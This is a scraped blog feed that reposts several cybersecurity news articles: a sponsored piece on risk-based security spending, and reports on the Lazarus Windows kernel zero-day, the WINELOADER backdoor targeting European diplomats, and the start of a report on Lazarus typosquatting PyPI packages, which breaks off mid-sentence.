id="trim-sidebar"></div> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/gtpdoor-linux-malware-targets-telecoms.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-50773695012970420492024-02-29T04:14:00.001-08:002024-02-29T04:14:52.714-08:00How To Prioritize Cybersecurity Spending: A Risk-Based Strategy For The Highest ROI<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Z4My6Ph03o7WzvIsEP2UaZZwPyozSUUSRlLrrJ42CtiIkMH2vPLKx3CC2Fqtt2bvbUjDx7KB2PP8dU2TDnQiugNz0iKu5xjbK2pILpEWrdgKeh8V5xT8OW5xLuOvBQthhB9vMi77tE8/s1600/h132.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Z4My6Ph03o7WzvIsEP2UaZZwPyozSUUSRlLrrJ42CtiIkMH2vPLKx3CC2Fqtt2bvbUjDx7KB2PP8dU2TDnQiugNz0iKu5xjbK2pILpEWrdgKeh8V5xT8OW5xLuOvBQthhB9vMi77tE8/s1600/h132.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx6cLLRZYUdyF4Dnf1amlfa1G46ydHBiTWhI9yV87d4ARWXvZez8qO6eAwr02DWcjB9cVWoli8jb56rXNm4eSLjqjjD4KIAKPAnh9-qFBZgAwKhm19FK1i3m_6_96_rQ4Pr0RdEzNKhU0Q_ONyYhvu7CMPTAx1J-MrqGPyZtgnOrq3XRN__0iChMnedXk/s728-rw-e365/lock.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Cybersecurity" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx6cLLRZYUdyF4Dnf1amlfa1G46ydHBiTWhI9yV87d4ARWXvZez8qO6eAwr02DWcjB9cVWoli8jb56rXNm4eSLjqjjD4KIAKPAnh9-qFBZgAwKhm19FK1i3m_6_96_rQ4Pr0RdEzNKhU0Q_ONyYhvu7CMPTAx1J-MrqGPyZtgnOrq3XRN__0iChMnedXk/s728-rw-e365/lock.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Cybersecurity"/></a></div> <p>As an IT leader, staying on top of the latest cybersecurity developments is essential to keeping your organization safe. But with threats coming from all around — and hackers dreaming up new exploits every day — how do you create proactive, agile cybersecurity strategies? And what cybersecurity approach gives you the most bang for your buck, mitigating your risks and maximizing the value of your cybersecurity investments?</p><a name='more'></a> <p>Let's take a closer look at the trends that are impacting organizations today, including the growing reach of data breaches and the increase in cybersecurity spending, and explore how you can get the most out of your cybersecurity resources, effectively securing your digital assets and maintaining your organization's integrity in the face of ever-evolving cyber threats.</p> <h2>Successful data breaches</h2> <p>In 2022, the number of people affected by data breaches increased significantly. According to the <a href="https://www.cnet.com/tech/services-and-software/data-breaches-hit-lots-more-people-in-2022/" rel="nofollow" target="_blank">Identity Theft Resource Center's 2022 Data Breach Report</a>, more than 1,800 data compromises were reported in 2022 — 60 fewer reports than in the previous year — but the number of people impacted by data breaches jumped by a whopping 40% to 422.1 million.</p> <p>And data breaches can cause real, long-lasting impacts, as proven by some of the most infamous data breaches in history:</p> <ul> <li>eBay: Hackers stole login credentials for just a few eBay employees and then pulled off a massive data breach that <a href="https://www.cnbc.com/2014/05/22/hackers-raid-ebay-in-historic-breach-access-145-mln-records.html" rel="nofollow" target="_blank">stole the personal information and passwords of more than 145 million users</a>. Experts believe that the hack had ramifications on users outside of eBay — as people tend to reuse passwords on multiple sites, there's a good chance that hackers were able to access other online services using the stolen credentials.</li> <li>Yahoo: In one of the biggest data breaches in history, <a href="https://www.cbsnews.com/news/yahoo-data-breach-117-5-million-settlement-reached/" rel="nofollow" target="_blank">Yahoo estimated that hackers had compromised over three billion accounts</a>. Although hackers didn't get passwords, they did gain access to users' security question answers, increasing the risk of identity theft. The company ultimately paid $35 million in regulatory fines and had to provide nearly 200 million people with credit monitoring services and other restitution valued at $117.5 million.</li> <li>Marriott: Hackers were able to spend nearly four years accessing Mariott's Starwood system, <a href="https://www.csoonline.com/article/567795/marriott-data-breach-faq-how-did-it-happen-and-what-was-the-impact.html" rel="nofollow" target="_blank">stealing data from more than 500 million hotel customers</a>. Cybercriminals stole everything from customer names and contact info to passport numbers, travel information, and financial information, including credit and debit card numbers and expiration dates. In addition to the massive blow to its reputation and loss of consumer trust, the company faced steep fines, including a £99 million fine from the UK Information Commissioner's Office (ICO) for violating British citizens' privacy rights under the GDPR.</li> </ul> <p>Given the escalating scope and impact of data breaches, it's clear that CISOs and IT teams have their work cut out to ensure their organization is prepared for anything. </p> <h2>Cyber spending trends</h2> <p>Unsurprisingly, with the growing cybersecurity problem, organizations are spending more money to bolster their cybersecurity resources. </p> <ul> <li>Tech research and advisory firm Gartner previously <a href="https://www.gartner.com/en/documents/4016190" rel="nofollow" target="_blank">estimated that the information security and risk management market will reach $172.5 billion in 2022</a>, and that the market will grow to $276.3 billion in 2026.</li> <li>Research firm Cybersecurity Ventures <a href="https://cybersecurityventures.com/stats/" rel="nofollow" target="_blank">forecasts that global spending on cybersecurity will cumulatively exceed $1.75 trillion</a> from 2021 to 2025. This is even more significant when you consider that in 2004, the cybersecurity market was valued at just $3.5 billion.</li> <li> IDC Data and Analytics <a href="https://www.cybersecuritydive.com/news/cybersecurity-spending-increase-idc/645338/" rel="nofollow" target="_blank">predicts that software spending will account for nearly half (47%) of all cybersecurity spending this year</a>, with services capturing 39% of expenditures and hardware accounting for 13%.</li> </ul> <h2>Getting the most from your cybersecurity resources</h2> <p>Clearly, there's no shortage of cybersecurity threats. So, how can an IT professional ensure they are maximizing the value of cybersecurity resources and getting every ounce of protection from cybersecurity investments? A risk-based approach, where you identify and prioritize your greatest vulnerabilities, and correlate threat exposure to business impact, will help protect organizations and optimize spending decisions. </p> <p>To adopt a risk-based approach, deploy the following strategies:</p> <ul> <li>Focus on your external attack surface. Your business' external attack surface includes all of your company's accessible digital assets — which present an enticing target for bad actors. You can't fix a problem if you don't know it exists; use a <a href="https://outpost24.com/products/external-attack-surface-management/?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=na_thehackernews&utm_content=guest-post" rel="nofollow" target="_blank">proven external attack surface management (EASM) solution</a> to regularly scan and monitor your assets for potential security gaps. </li> <li>Prioritize protection of end user credentials. As eBay found, gaining access to just a handful of user credentials can effectively give hackers an open-door invite to your network and data. Ensure you provide employees with regular, ongoing security training to help them become more adept at identifying and appropriately responding to cyber risks. Deploy robust identity and access management protocols across your organization. And use a <a href="https://specopssoft.com/product/specops-password-auditor/?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=na_thehackernews&utm_content=guest-post" rel="nofollow" target="_blank">password auditor</a> to ensure that your employees aren't using passwords that have already been breached or compromised. </li> <li>Prioritize vulnerability remediation across your networks and cloud services. Invest in a <a href="https://outpost24.com/products/risk-based-vulnerability-management/?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=na_thehackernews&utm_content=guest-post" rel="nofollow" target="_blank">risk-based vulnerability management solution</a> that will help you prioritize threats based on the highest risks posted (based on likelihood and exploit availability), rather than wasting time and resources on vulnerabilities that pose little threat.</li> <li>Integrate a threat intelligence solution. To proactively adapt your organization's defenses against emerging threats and attack vectors, you should invest in a <a href="https://outpost24.com/products/cyber-threat-intelligence/?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=na_thehackernews&utm_content=guest-post" rel="nofollow" target="_blank">threat intelligence solution</a> that provides real-time insights into evolving threats to your organization and industry. By focusing your attention (and spending) on high-impact, likely-to-be-exploited vulnerabilities, you can strategically deploy resources to address your most pressing security concerns.</li> </ul> <h2>Prioritize a risk-based approach to boost cybersecurity ROI</h2> <p>Today's digital landscape requires IT pros to prioritize a risk-based approach to cybersecurity, ensuring that your investments address current and future threats. By strategically deploying your organization's resources — using robust solutions and focusing on high-impact vulnerabilities — you'll be taking steps to keep your organization safe, maintain your operational integrity, and boost your cybersecurity ROI.</p> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? <span class="">This article is a contributed piece from one of our valued partners.</span> Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/why-risk-based-approach-to.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-51362643712151834152024-02-29T04:08:00.001-08:002024-02-29T04:08:54.647-08:00Lazarus Hackers Exploited Windows Kernel Flaw As Zero-Day In Recent Attacks<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPBxxR7YJknTLV3mkk5wOE0FKOdGTt0Qaf_-iraW4Wy_366wf3FnfiMh4UaRPCs7hdRW2lOXoNlgc8CE39CP5z4C3t0nyBWS5MTeQsz8YwcNPMBF3FMDNGG_JhdAsq9vMD7DhWV3GuCo/s1600/h53.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPBxxR7YJknTLV3mkk5wOE0FKOdGTt0Qaf_-iraW4Wy_366wf3FnfiMh4UaRPCs7hdRW2lOXoNlgc8CE39CP5z4C3t0nyBWS5MTeQsz8YwcNPMBF3FMDNGG_JhdAsq9vMD7DhWV3GuCo/s1600/h53.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisrskToitHG7n0s2enrcivue-oDauhlBJYY7fsZnbkBpQh_cugw4OVk_EYMlI4nN6R4m3Y8_N1fUBO8WLYVmjeVh8GUZkk03ajo73nlUxNmNeSFALcrpAaCXOwZllK2rWc4QXew1lC5DkmP9yY2OfLACu8t7Te_noxggC4HZJ85ZzE8EheoNVGOhOAHO0B/s728-rw-e365/windows-hacked.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Windows Kernel Flaw" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisrskToitHG7n0s2enrcivue-oDauhlBJYY7fsZnbkBpQh_cugw4OVk_EYMlI4nN6R4m3Y8_N1fUBO8WLYVmjeVh8GUZkk03ajo73nlUxNmNeSFALcrpAaCXOwZllK2rWc4QXew1lC5DkmP9yY2OfLACu8t7Te_noxggC4HZJ85ZzE8EheoNVGOhOAHO0B/s728-rw-e365/windows-hacked.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Windows Kernel Flaw"/></a></div> <p>The notorious Lazarus Group actors exploited a recently patched privilege escalation flaw in the Windows Kernel as a zero-day to obtain kernel-level access and disable security software on compromised hosts.</p><a name='more'></a> <p>The vulnerability in question is <strong>CVE-2024-21338</strong> (CVSS score: 7.8), which can permit an attacker to gain SYSTEM privileges. It was resolved by Microsoft earlier this month as part of <a href="https://thehackernews.com/2024/02/microsoft-rolls-out-patches-for-73.html" rel="nofollow" target="_blank">Patch Tuesday updates</a>.</p> <p>"To exploit this vulnerability, an attacker would first have to log on to the system," Microsoft <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338" rel="nofollow" target="_blank">said</a>. "An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system."</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/boundaries728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8jfOSH2bKOt2gBs66HZ2g8-Sa4GLfLVJj4v6n095wW7K5LxBTme0I4_WtuOxVN06o-2_Q9_HJguxYNEnyh8Lj71pveVGNVcdIoSR_eslblYptSfYyZKM-s8kRRBzoHyh1luk9Ts8f_2D3sEdOd-0w3DGzFnrBvFTHdnvmchCiaJ886H6kSZG0DkfAncqF/s728-rw-e365/boundaries728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>While there were no indications of active exploitation of CVE-2024-21338 at the time of the release of the updates, Redmond on Wednesday revised its "Exploitability assessment" for the flaw to "Exploitation Detected." </p> <p>Cybersecurity vendor Avast, which <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/" rel="nofollow" target="_blank">discovered</a> an in-the-wild admin-to-kernel exploit for the bug, said the kernel read/write primitive achieved by weaponizing the flaw allowed the Lazarus Group to "perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit."</p> <p>The FudModule rootkit was <a href="https://thehackernews.com/2022/10/hackers-exploiting-dell-driver.html" rel="nofollow" target="_blank">first reported</a> by ESET and AhnLab in October 2022 as capable of disabling the monitoring of all security solutions on infected hosts by means of what's called a Bring Your Own Vulnerable Driver (BYOVD) attack, wherein an attacker a driver susceptible to a known or zero-day flaw to escalate privileges.</p> <p>What makes the latest attack significant is that it goes "beyond BYOVD by exploiting a zero-day in a driver that's known to be already installed on the target machine." That susceptible driver is appid.sys, which is crucial to the functioning of a Windows component called <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker" rel="nofollow" target="_blank">AppLocker</a> that's responsible for application control.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSRunES18hts1BC1NThOE1i0E-srNQAtTg5lZ369tr5CvMn5O6RMKdKytxj5LpXVkMD6rIr71FhfnN5HcA-_I9zxXkOIGwC8bY8GvkUEJy4xr7AYD3JYX1Ttl0ciGiBFrchcCEeUjLmj7M7RrBVMAqeqZ8iJn1uVOePMBRlK-8gEhl2Z_9Qr1PNA6Lhy9_/s728-rw-e365/app.png" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Windows Kernel Flaw" border="0" data-original-height="476" data-original-width="1019" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSRunES18hts1BC1NThOE1i0E-srNQAtTg5lZ369tr5CvMn5O6RMKdKytxj5LpXVkMD6rIr71FhfnN5HcA-_I9zxXkOIGwC8bY8GvkUEJy4xr7AYD3JYX1Ttl0ciGiBFrchcCEeUjLmj7M7RrBVMAqeqZ8iJn1uVOePMBRlK-8gEhl2Z_9Qr1PNA6Lhy9_/s728-rw-e365/app.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Windows Kernel Flaw"/></a></div> <p>The real-world exploit devised by the Lazarus Group entails using CVE-2024-21338 in the appid.sys driver to execute arbitrary code in a manner that bypasses all security checks and runs the FudModule rootkit.</p> <p>"FudModule is only loosely integrated into the rest of Lazarus' malware ecosystem and that Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances," security researcher Jan Vojtěšek said, describing the malware as under active development.</p> <p>Besides taking steps to sidestep detection by disabling system loggers, FudModule is engineered to turn off specific security software such as AhnLab V3 Endpoint Security, CrowdStrike Falcon, HitmanPro, and Microsoft Defender Antivirus (formerly Windows Defender).</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>The development marks a new level of technical sophistication associated with North Korean hacking groups, continuously iterating its arsenal for improved stealth and functionality. It also illustrates the elaborate techniques employed to hinder detection and make their tracking much harder.</p> <p>The adversarial collective's <a href="https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html" rel="nofollow" target="_blank">cross-platform focus</a> is also exemplified by the fact that it has been <a href="https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/" rel="nofollow" target="_blank">observed</a> using bogus calendar meeting invite links to stealthily install malware on Apple macOS systems, a campaign that was <a href="https://thehackernews.com/2023/12/n-korean-kimsuky-targeting-south-korean.html" rel="nofollow" target="_blank">previously documented</a> by SlowMist in December 2023.</p> <p>"Lazarus Group remains among the most prolific and long-standing advanced persistent threat actors," Vojtěšek said. "The FudModule rootkit serves as the latest example, representing one of the most complex tools Lazarus holds in their arsenal."</p> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/lazarus-hackers-exploited-windows.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-49804751235361912542024-02-29T00:43:00.001-08:002024-02-29T00:43:20.020-08:00New Backdoor Targeting European Officials Linked To Indian Diplomatic Events<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaJdMAhQz9pLC4ZPe2X7Ssa7p00F4Pding-8ltbFahCkpscAeZwiOiC0n_Vr60BjTKFTbuSnWRLpsjwW-XxoG__dnDvOmtSHNTirp5yrXVRyM58o5EndQum9I2jWRPxvvRdjUZWYV7AhE/s1600/h89.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaJdMAhQz9pLC4ZPe2X7Ssa7p00F4Pding-8ltbFahCkpscAeZwiOiC0n_Vr60BjTKFTbuSnWRLpsjwW-XxoG__dnDvOmtSHNTirp5yrXVRyM58o5EndQum9I2jWRPxvvRdjUZWYV7AhE/s1600/h89.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv97o8vYE-bCkTyewAfwFqbXiCjYGi5xgZFIUcejJ_po1BiM36fhNzLV3YGMtwpx2RWJ4OenARptW_EE9QXOrAANbn0mj0EHnoKC3UU9O7qiPHKGWkJpDvktX6gfXsQPzoNU1s5Ltxu5deZ4kxqNKQXC8mGfVlAdem0fvA_bGVEw3rLpLQNwvwjwe7loKG/s728-rw-e365/cyber.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Backdoor" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv97o8vYE-bCkTyewAfwFqbXiCjYGi5xgZFIUcejJ_po1BiM36fhNzLV3YGMtwpx2RWJ4OenARptW_EE9QXOrAANbn0mj0EHnoKC3UU9O7qiPHKGWkJpDvktX6gfXsQPzoNU1s5Ltxu5deZ4kxqNKQXC8mGfVlAdem0fvA_bGVEw3rLpLQNwvwjwe7loKG/s728-rw-e365/cyber.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Backdoor"/></a></div> <p>A previously undocumented threat actor dubbed <strong>SPIKEDWINE</strong> has been observed targeting officials in European countries with Indian diplomatic missions using a new backdoor called <b>WINELOADER</b>.</p><a name='more'></a> <p>The adversary, according to a <a href="https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader" rel="nofollow" target="_blank">report</a> from Zscaler ThreatLabz, used a PDF file in emails that purported to come from the Ambassador of India, inviting diplomatic staff to a wine-tasting event on February 2, 2024.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/delinea728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFl0XFULXGgKLO8peSzZVqzrRFLL1K51a-m-G6uIJ_5KYJF3VkmlD8kLYYJbfF9RDGmWvinkoGe_YUnOdYnQoIe-rq2bEJ7Gcm7UjAHe3AsXed7FIGQcL6ecVaPInWYtwYQpmod0QvcVtoXiPtzDLzwVlBCSjBTOcP_4ZdpH-ExGJTcUGzTwR8BvCuBoD/s728-rw-e365/delinea728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>The <a href="https://www.virustotal.com/gui/file/3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9" rel="nofollow" target="_blank">PDF document</a> was uploaded to VirusTotal from Latvia on January 30, 2024. That said, there is evidence to suggest that this campaign may have been active at least since July 6, 2023, going by the discovery of <a href="https://www.virustotal.com/gui/file/ad43bbb21e2524a71bad5312a7b74af223090a8375f586d65ff239410bbd81a7" rel="nofollow" target="_blank">another similar PDF file</a> uploaded from the same country.</p> <p>"The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command-and-control (C2) infrastructure," security researchers Sudeep Singh and Roy Tay said.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcsRm522CRdvtVfeBMgXbZhjht3DvrSEJFvk6H6RYkLexWqVbo5ENDvZ_XdVh7n-Q25dHmYFjvxvatKQsp1C0y5aCJGZ23gsc3ZeKMPKfSzdTdFVLKJmo3FHXEloYXYepGCF_ZhSe9KZY8-EzSL3DoegnRjizdjHNThsfiXG-1ZG1n2fv_qrvDx8KKbOY1/s728-rw-e365/payload.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Backdoor" border="0" data-original-height="469" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcsRm522CRdvtVfeBMgXbZhjht3DvrSEJFvk6H6RYkLexWqVbo5ENDvZ_XdVh7n-Q25dHmYFjvxvatKQsp1C0y5aCJGZ23gsc3ZeKMPKfSzdTdFVLKJmo3FHXEloYXYepGCF_ZhSe9KZY8-EzSL3DoegnRjizdjHNThsfiXG-1ZG1n2fv_qrvDx8KKbOY1/s728-rw-e365/payload.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Backdoor"/></a></div> <p>Central to the novel attack is the PDF file that comes embedded with a malicious link that masquerades as a questionnaire, urging the recipients to fill it out in order to participate. Clicking on the link paves the way for an HTML application ("wine.hta") that contains obfuscated JavaScript code to retrieve an encoded ZIP archive bearing WINELOADER from the same domain.</p> <p>The malware is packed with a core module that's designed to Execute modules from the C2 server, inject itself into another dynamic-link library (DLL), and update the sleep interval between beacon requests.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>A notable aspect of the cyber incursions is the use of compromised websites for C2 and hosting intermediate payloads. It's suspected that the "C2 server only responds to specific types of requests at certain times," thereby making the attacks more evasive.</p> <p>"The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions," the researchers said.</p> <div count="4" id="trim-sidebar"></div> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/new-backdoor-targeting-european.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-71961691224788787452024-02-29T00:37:00.001-08:002024-02-29T00:37:21.499-08:00Lazarus Exploits Typos To Sneak PyPI Malware Into Dev Systems<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8VzRpFZPzoEFqusK7hObnmcReZWinCiBx-ws0ye2EyR9b8ntJXWPfF5mAhwm01HlXWQy5gM4bdcjQQpGa5ZfDMH8_YRaT3Ax0GrEeRZB2HPLTvOd1TMRljLbpAb1y0AR_3_S-bDBz1v4/s1600/h131.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8VzRpFZPzoEFqusK7hObnmcReZWinCiBx-ws0ye2EyR9b8ntJXWPfF5mAhwm01HlXWQy5gM4bdcjQQpGa5ZfDMH8_YRaT3Ax0GrEeRZB2HPLTvOd1TMRljLbpAb1y0AR_3_S-bDBz1v4/s1600/h131.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoOsvoEPlyoX-fS2syYNGtZUBYDatyFso4vFhczOLHv2RN26jv1aYHAlfM6N1GnfOWfmbARMQWwiU2gWQ_ckElD6-NNqTYUJaauHWhP4n0AeAyjKIyakYdSVFYoinbYDKsVdIazYQ6Dnz3crRqalSPwYylrYGrPlkmHHnJg1AmMA2iLtjEoGFNZ7EZUl9b/s728-rw-e365/dll.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="PyPI Malware" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoOsvoEPlyoX-fS2syYNGtZUBYDatyFso4vFhczOLHv2RN26jv1aYHAlfM6N1GnfOWfmbARMQWwiU2gWQ_ckElD6-NNqTYUJaauHWhP4n0AeAyjKIyakYdSVFYoinbYDKsVdIazYQ6Dnz3crRqalSPwYylrYGrPlkmHHnJg1AmMA2iLtjEoGFNZ7EZUl9b/s728-rw-e365/dll.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="PyPI Malware"/></a></div> <p>The notorious North Korean state-backed hacking group Lazarus uploaded four packages to the Python Package Index (PyPI) repository with the goal of infecting developer systems with malware.</p><a name='more'></a> <p>The packages, now taken down, are <a href="https://www.pepy.tech/projects/pycryptoenv" rel="nofollow" target="_blank">pycryptoenv</a>, <a href="https://www.pepy.tech/projects/pycryptoconf" rel="nofollow" target="_blank">pycryptoconf</a>, <a href="https://www.pepy.tech/projects/quasarlib" rel="nofollow" target="_blank">quasarlib</a>, and <a href="https://www.pepy.tech/projects/swapmempool" rel="nofollow" target="_blank">swapmempool</a>. They have been collectively downloaded 3,269 times, with pycryptoconf accounting for the most downloads at 1,351.</p> <p>"The package names pycryptoenv and pycryptoconf are similar to pycrypto, which is a Python package used for encryption algorithms in Python," JPCERT/CC researcher Shusei Tomonaga <a href="https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html" rel="nofollow" 